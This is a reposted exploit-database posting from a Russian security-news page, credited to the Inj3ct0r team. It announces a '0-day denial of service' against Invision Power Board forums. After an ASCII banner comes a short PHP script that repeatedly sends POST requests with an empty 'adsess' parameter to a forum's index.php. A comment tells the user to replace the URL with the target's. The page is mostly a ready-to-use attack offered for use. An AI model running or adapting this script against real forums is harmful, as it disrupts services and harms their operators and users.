Дополнительная информация

Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

CORE-2010-0406 - User Invoices Persistent XSS Vulnerability in CactuShop

Secunia Research: e107 Content Management Plugin Script Insertion Vulnerability

IP address spoofing in e107

CSRF in e107

From:	Inj3ct0r.com <inj3ct0r_(at)_list.ru>
Date:	22 апреля 2010 г.
Subject:	Invision Power Board 0-day denial of service

============================================
Invision Power Board 0-day denial of service
============================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ####################################              1
0                    I'm SeeMe  member from Inj3ct0r Team              1
1                    ####################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


#[+] 90% works
#[+] Finaly created by SeeMe
#[+] Greetz to inj3ct0r Crew
#[+] Site            : Inj3ct0r.com



<?
set_time_limit(60);
for($i = 1 ; $i <= 10 ; $i++)
{
//to put curl to send POST request
$ch = curl_init();
//change http://127.0.0.1/forum to the url of the script
curl_setopt($ch , CURLOPT_URL , 'http://127.0.0.1/forum/index.php?');
curl_setopt($ch , CURLOPT_POST , 1) ;
curl_setopt($ch , CURLOPT_POSTFIELDS ,
'adsess=');
curl_exec($ch);
curl_close($ch);
}
//Finished check it out!
?>


# Inj3ct0r.com [2010-04-21]